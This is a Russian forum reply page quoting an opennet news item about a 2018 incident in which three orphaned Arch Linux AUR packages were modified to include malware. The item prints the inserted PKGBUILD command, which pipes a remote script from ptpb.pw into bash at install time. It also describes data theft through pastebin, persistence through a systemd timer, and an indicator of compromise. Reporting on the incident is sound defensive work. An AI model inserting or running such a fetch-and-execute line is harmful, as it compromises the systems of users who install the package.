forum.opennet.ru

Составление сообщения

Исходное сообщение

"В AUR-репозитории Arch Linux найдено вредоносное ПО"
Отправлено opennews, 11-Июл-18 10:22

В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/...) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах
acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и  minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов.
7 июля в пакеты были внесены изменения, в результате которых
в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...) код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта  "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через вызов по таймеру в systemd (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей. Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh.
Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. Проблема была выявлена в течение несколько часов после модификации пакетов. Изменение было сразу отклонено,  а учётная запись  разработчика xeactor заблокирована. Пользователям 7 июля устанавливавшим обновления вышеотмеченных пакетов рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).
URL: https://sensorstechforum.com/arch-linux-aur-repository-found.../
Новость: https://www.opennet.ru/opennews/art.shtml?num=48948

Исходное сообщение
"В AUR-репозитории Arch Linux найдено вредоносное ПО" Отправлено opennews, 11-Июл-18 10:22
В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/...) три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для сжатия файлов) и minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) (GUI для майнинга криптовалют). В данные пакеты был добавлен код для загрузки и запуска скрипта с внешнего сервера, активируемый во время установки пакетов. 7 июля в пакеты были внесены изменения, в результате которых в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id...) код "curl -s https://ptpb.pw/~x\|bash -&" вызываемый в секции установки пакета. Указанный скрипт выполнял загрузку другого скрипта "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh и активировал через вызов по таймеру в systemd (создавался файл /usr/lib/systemd/system/xeactor.timer). В скрипте u.sh присутствовал код для отправки сведений о системе и установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt в домашних директориях всех пользователей. Несмотря на то, что вредоносный код ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой момент заменить содержимое u.sh. Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся без мэйнтейнера. Проблема была выявлена в течение несколько часов после модификации пакетов. Изменение было сразу отклонено, а учётная запись разработчика xeactor заблокирована. Пользователям 7 июля устанавливавшим обновления вышеотмеченных пакетов рекомендуется проверить свои системы на предмет возможной компрометации (например, о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer). URL: https://sensorstechforum.com/arch-linux-aur-repository-found.../ Новость: https://www.opennet.ru/opennews/art.shtml?num=48948

Ваше сообщение

Имя*:

EMail:

Для отправки ответов на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email).
Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.

Заголовок*:

Сообщение*:

> В AUR-репозитории Arch Linux, в котором размещаются не входящие в дистрибутив пакеты 
> от сторонних разработчиков, найдены (https://lists.archlinux.org/pipermail/aur-general/2018-July/034151.html) 
> три пакета, содержащие вредоносные вставки. Проблема выявлена в пакетах 
> acroread 9.5.5-8 (https://aur.archlinux.org/cgit/aur.git/?h=acroread) (Adobe PDF 
> Reader), balz 1.20-3 (https://aur.archlinux.org/cgit/aur.git/?h=balz) (утилита для 
> сжатия файлов) и  minergate 8.1-2 (https://aur.archlinux.org/cgit/aur.git/?h=minergate) 
> (GUI для майнинга криптовалют). В данные пакеты был добавлен код для 
> загрузки и запуска скрипта с внешнего сервера, активируемый во время установки 
> пакетов.

> 7 июля в пакеты были внесены изменения, в результате которых 
> в файл PKGBUILD был добавлен (https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc) 
> код "curl -s https://ptpb.pw/~x|bash -&" вызываемый в секции установки пакета. Указанный 
> скрипт выполнял загрузку другого скрипта  "https://ptpb.pw/~u", устанавливал его как /usr/lib/xeactor/u.sh 
> и активировал через вызов по таймеру в systemd (создавался файл /usr/lib/systemd/system/xeactor.timer). 
> В скрипте u.sh присутствовал код для отправки сведений о системе и 
> установленных пакетах через сервис pastebin.com, а также для создания файла compromised.txt 
> в домашних директориях всех пользователей. Несмотря на то, что вредоносный код 
> ограничивался отправкой сведений о системе, ничто не мешает злоумышленникам в любой 
> момент заменить содержимое u.sh.

> Изменения были внесены пользователем xeactor в пакеты, имеющие статус orphaned, т.е. оставшиеся 
> без мэйнтейнера. Проблема была выявлена в течение несколько часов после модификации 
> пакетов. Изменение было сразу отклонено,  а учётная запись  разработчика 
> xeactor заблокирована. Пользователям 7 июля устанавливавшим обновления вышеотмеченных 
> пакетов рекомендуется проверить свои системы на предмет возможной компрометации (например, 
> о наличии вредоносного ПО в системе может сигнализировать файл /usr/lib/systemd/system/xeactor.timer).

> URL: https://sensorstechforum.com/arch-linux-aur-repository-found-contain-malware/ 
 
> Новость: https://www.opennet.ru/opennews/art.shtml?num=48948

При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.

Партнёры:

Хостинг:

Закладки на сайте
Проследить за страницей

Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру